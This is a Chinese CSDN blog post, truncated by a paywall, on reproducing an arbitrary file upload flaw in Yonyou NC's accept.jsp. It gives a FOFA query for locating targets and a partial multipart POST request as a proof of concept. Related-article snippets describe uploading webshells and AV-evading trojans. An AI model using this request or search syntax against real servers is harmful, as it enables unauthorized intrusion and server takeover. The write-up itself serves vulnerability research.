用友NC accept.jsp任意文件上传(含批量验证poc)

已于 2024-04-15 20:31:52 修改
阅读量68 收藏
点赞数
分类专栏: 漏洞复现 文章标签: java 开发语言 web安全
于 2024-04-15 20:30:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137794416
版权
本文详细介绍了用友NC中accept.jsp存在的任意文件上传漏洞,该漏洞可能导致服务器权限被攻击者获取。复现过程通过fofa搜索语法定位到目标应用,POC表明文件将保存在根目录。
摘要由CSDN通过智能技术生成

漏洞描述

用友NC accept.jsp处存在任意文件上传漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。

image.png

漏洞复现

fofa语法:app=”用友-UFIDA-NC”
POC

POST /aim/equipmap/accept.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Host: 
Content-Type: multipart/form-data; boundary=---------------------------16314487820932200903769468567
Content-Length: 206
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Connection: close

----------170237501
Content-Disposition: form-data; name="file";filename="ok.txt"

1234
----
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
专栏目录
订阅专栏
【漏洞复现】用友NC-accept-任意文件上传
知黑而守白
01-23 301
用友NC是北京用友软件股份有限公司(简称“用友”)开发的一款企业管理软件,支持财务会计、人力资源、供应链、生产制造、客户关系管理等多个业务领域,涵盖了企业核心业务及管理流程。用友NC是基于B/S架构的软件系统,提供基于云计算、SaaS模式、本地部署等多种部署方式,广泛应用于国内外众多中小型企业和大型企业。用友NC允许攻击者通过accept.jsp接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。
【漏洞复现】用友NC-任意文件上传-uploadFile
知黑而守白
05-05 272
用友NC是北京用友软件股份有限公司(简称“用友”)开发的一款企业管理软件,支持财务会计、人力资源、供应链、生产制造、客户关系管理等多个业务领域,涵盖了企业核心业务及管理流程。用友NC是基于B/S架构的软件系统,提供基于云计算、SaaS模式、本地部署等多种部署方式,广泛应用于国内外众多中小型企业和大型企业。用友NC允许攻击者通过uploadFile接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。
【漏洞复现】用友 NC FileReceiveServlet 任意文件上传漏洞
最新发布
凝聚力安全团队
07-23 1512
用友NC是大型企业管理与电子商务平台,帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心(C2B);从流程驱动转向数据驱动(DDE);从延时运行转为实时运行(RTE);从领导指挥到员工创新(E2M)
用友NC-Cloud全版本任意文件上传
初岄的博客
10-20 570
用友NC-Cloud最近爆出存在全版本任意文件上传漏洞的问题。现在已经确认了这个漏洞可以被攻击者利用,目前找不到此漏洞适用的最低版本。攻击者可以通过该漏洞将任意文件上传至服务器,并以此将webshell上传至服务器,从而获得服务器的命令执行权限。
漏洞复现--用友NC accept.jsp任意文件上传
qq_53003652的博客
11-07 732
用友NC是大型企业管理与电子商务平台,帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心(C2B);从流程驱动转向数据驱动(DDE);从延时运行转为实时运行(RTE);从领导指挥到员工创新(E2M)。用友NC accept.jsp处存在任意文件上传漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。上传成功,并且成功解析,可上传免杀马获得服务器权限。访问/test.jsp
【漏洞复现】蓝凌EIS api.aspx 任意文件上传漏洞
凝聚力安全团队
06-19 312
蓝凌EIS api.aspx 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器,导致服务器失陷。蓝凌EIS,是一款专为成长型企业打造的沟通、协同、社交的一动办公平台,涵盖了OA、沟通、客户。人事以及知识库等管理需求,最终目的是打造简单而高效的工作方式,真正做到企业管理的信息化。
用友NC Cloud accept.jsp接口任意文件上传漏洞复现 [附POC]
薛定谔嘚喵博客
11-10 384
NC Cloud是用友推出的大型企业数字化平台。 用友网络科技股份有限公司NC Cloud存在任意文件上传漏洞,攻击者可利用该漏洞获取服务器控制权。
用友NC-Cloud_importhttpscer接口存在任意文件上传漏洞(批量验证poc
weixin_43567873的博客
04-08 104
用友NC-Cloud_importhttpscer接口存在任意文件上传漏洞(批量验证poc
用友UFIDA-NC download 任意文件下载漏洞复现(nuclei-poc
m0_50797689的博客
03-21 365
用友UFIDA-NC download 任意文件下载漏洞复现(nuclei-poc
【1day】复现用友 NC NCFindWeb大型企业数字化平台及用友系统uapjs(jsinvoke)任意文件上传漏洞
记录并分享学习安全的知识点..
07-25 1066
用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。用友NCNC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器。
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞。漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击者可在目标系统上传任意文件执行命令。
【漏洞复现】泛微OA E-Cology getdata.jsp SQL注入漏洞
凝聚力安全团队
07-18 463
泛微OA E-Cology getdata.jsp 接口存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 901
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
用友OA/NC/NCCloud SQL注入任意文件上传和读取RCE复现渗透测试记录
kelenwait的博客
06-23 7778
简介 用友公司成立于1988年,全面提供具有自主知识产权的企业管理/ERP软件、服务与解决方案,是中国最大的管理软件、ERP软件、集团管理软件、人力资源管理软件、客户关系管理软件及小型企业管理软件提供商。 漏洞情况 用友OA_U8 存在SQL 注入 用友NCCloud FS文件管理 SQL 注入 用友NC bsh.servlet.BshServlet 远程命令执行 用友NC 任意文件上传 getShell 漏洞复现 1.用友 OA_U8 SQL 注入 poc /yyoa/common/js/menu/tes
用友漏洞php,用友NC任意文件上传漏洞复现
weixin_29786123的博客
03-29 2746
0x00 事件描述用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友NC 为C/S 架构,使用JAVA编程语言开发,客户端可直接使用UClient,服务端接口为HTTP。用友NC6.5的某个页面,存在任意文件上传漏洞。漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏...
用友u8c文件上传
weixin_51345872的博客
03-17 1903
文件上传
用友ncc accept.jsp漏洞
Karka_的博客
03-16 963
accept.jsp源码中设置了白名单和黑名单的代码,但是白名单代码被注释掉了(默认被注释)只启用了黑名单。文件保存的函数fname又被定义为可以随便更改。那可以上传白名单内的文件名,然后通过传参将文件保存的名字进行修改。以及修改文件位置(具体源码不能够在平台展示出)
汉得 SRMtomcat.jsp 登录绕过漏洞 POC
09-01
很抱歉,我无法提供关于汉得 SRMtomcat.jsp登录绕过漏洞的POC。我的回答只限于提供有关麦田怪圈的信息。如果你有其他关于麦田怪圈的问题,我会很乐意帮助你。<span class="em">1 #### 引用[.reference_title] - *1* ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值